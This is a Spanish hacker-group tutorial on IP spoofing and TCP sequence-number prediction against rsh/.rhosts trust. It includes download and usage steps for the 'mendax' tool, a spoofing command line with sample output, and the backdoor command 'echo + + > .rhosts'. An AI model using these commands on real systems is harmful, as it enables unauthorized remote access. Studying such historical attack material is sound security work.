Hecho por Powertech Powertech@mixmail.com EZKRACHO TEAM ----====SPOOFING====----Nro.1 Que es el Spoofing? ------------------- El spoof tradicional es cuando los'atacantes' falsean el origen de los paquetes haciendo que la victima piense que estos son de un host de confianza o autorizado para saltar un firewall o que la victimas no nos detecten. TCP y IP spoofing ------------------ Centremonos en Nuestro server (linux/unix/Bsb) que protege varios servicios al mismo tiempo atravez de los ya conocidos Tcp Wrappers y con herramientas tipo Firewalls que protegen toda una RED. La mayoria de estas herramientas protege, comparando Host y IP y utilizandolos para identificarlos por ejemplo los archivos /etc/host.allow y /etc/host.deny. /etc/host.allow (supongamos que es una red local y yo 192.168.0.1 soy el server y nada mas quiero que ellos usen mis servicios) AllowHosts caos.ezkracho.com.ar,192.168.0.2 kuazar.ezkracho.com.ar,192.168.0.3 bach.ezkracho.com.ar,192.168.0.4 giba.ezkracho.com.ar,192.168.0.5 hellraiser.ezkracho.com.ar,192.168.0.6 /etc/host.deny (estos son los que no quiero que usen mis servicios) DenyHosts gerente.ezkracho.com.ar, 192.168.0.7 cinic.ezkracho.com.ar, 192.168.0.8 sperman.ezkracho.com.ar, 192.168.0.9 pero tambien se pueden poner rangos de ip tipo 200.0.212.* o 200.*.*.* Vamos a un caso de spoof basico ------------------------------- Supongamos bach.ezkracho.com.ar esta corriendo un NT server con wingate y cinic.ezkracho.com.ar que quiere entrar a mi server, pero no tiene acceso a mi server, entonces cinic hace: $telnet 192.168.0.4 23 wingate>192.168.0.1 21...conected 200 Ezkracho Server (wu-ftp 6.9) on host powertech.ezkracho.com.ar --------------- Bienvenido Ezkracho Server --------------- ftp>user ftp 331 Anonymous access allowed, send identity (e-mail name) as password pass email@email.com 230 Anonymous user logged in. 0-----0 Ataque Spoof de numeros secuenciales ---------------------------------- Tenemos un Webserver y tenemos al CLASICO atacante, vamos a dar el servicio rhosts que es un buen ejemplo porque rhosts hace una conexion de confiansa entre dos makinas porque tiene 'autentificacion remota'rlogin,rsh,rcp y rcmp porque los usuarios que tienen acceso a estos servicios son confiados y estan autorizados a entrar a: systema local sin passwd un ejemplo del archivo .rhosts node1.ezkracho.com.ar caos node2.ezkracho.com.ar kuazar node3.ezkracho.com.ar giba node4.ezkracho.com.ar bach node5.ezkracho.com.ar hellraiser Cuando el circuito virtual esta establecido,los dos hosts tienen que tener iguales maneras de verificacion que los datos sean transferidos limpiamente. Por esto TCP usa en (ingles) sequence numbers. TCP le asigna a cada paquete un numero como index identificatorio. Los dos hosts usan este numero para chequear errores y reportarlos. Es mas, este proceso de pasar los numeros secuenciales cuando el circuito ya esta establecido. El siguiente articulo fue escrito por Rik Farrow que explica el sistema de numeros secuenciales. La secuencia es usada para aceptar los datos que llegan. Al principio de la conección, el cliente que manda los paquetes TCP con un numero en secuencia inicial, pero no certificada (no puede haber una ahora). Si la aplicacion del server esta corriendo del otro lado de la coneccion, el server manda de vuelta el paquete con su propia inical de numero secuencial desde el paquete del cliente mas uno. Cuando el sistema cliente resive este paquete, lo debe mandar de vuelta con su propia confirmacion: el numero inicial del server mas uno. El atacante tiene dos problemas el primero es cambiar la direccion y la otra es mantenerla secuencia en el dialogo con la makina victima, el segundo es el mas complica el ataque ya que el numero secuencial ya que el cambio del mismo no es arbitrario. Si el atacante adivina correctamente el numero, este puede sincronisarse con la victima y iniciar una sesinon. Desde ahora la makina del atacante quedavinculada a la makina victima como un host de confiansa, y puede iniciar conecciones tipo rhosts asi pude logearse. Un caso de ataque secuencial ----------------------------- Aplicacion:mendax para linux lenuage:c http://esperosun.chungnam.ac.kr/-jmkim/hacking/1997/11/mendax_linux.tgz Para usarlo tenemos que hacer gunzip mendax_linux.tgz tar -xvf mandax_linux.tar make ./mendax estas son las opciones -p Port -s Port -l Username -r Username -c command -w Port -d -t -L TERM -S PORT ahora mi objetivo es ejecutar el comando rsh desde 192.168.0.8 a 192.168.0.1 spoofeando me por 192.168.0.2 ,el commando que quiero ejecutar es: mv .rhosts .r; echo + + > .rhosts para spoofearme [root@gerente]# mendax -p 514 192.168.0.2 192.168.0.1 -l caos -r caos Flooding sourse con TCP SYN packets from 192.168.0.8 samplin secuense numbers seq number: 816640001, ack number: 64001 difference:64000 seq number: 816640001, ack number: 128001 difference:64000 seq number: 816640001, ack number: 192001 difference:64000 using 64000 as prediction difference (3 hits) spoofing rshd reseting TCP target connection: reseting source: .............. [root@gerente]# para ver si funciono ls -l .r* -rw-r--r-- 1 caos user fecha .rhosts el archivo rhosts tiene que tener en el ++ y deaspues en el log aparece fecha gnss rshd: caos@192.168.0.2 ============================================================================== En el proximo capiulo explicare Como prevenir el IP spoofing, ARP spoofing, DNS spoofing, y Spoof estra;os ============================================================================== Bibliografia RPC 325 Robert Morris Theorie M.i.t ________ _/ezkracho\_________________________ Texto hecho por Powertech * powertech@mixmail.com * Ezkracho Team * http://www.ezkracho.piratas.org * ___________________________________*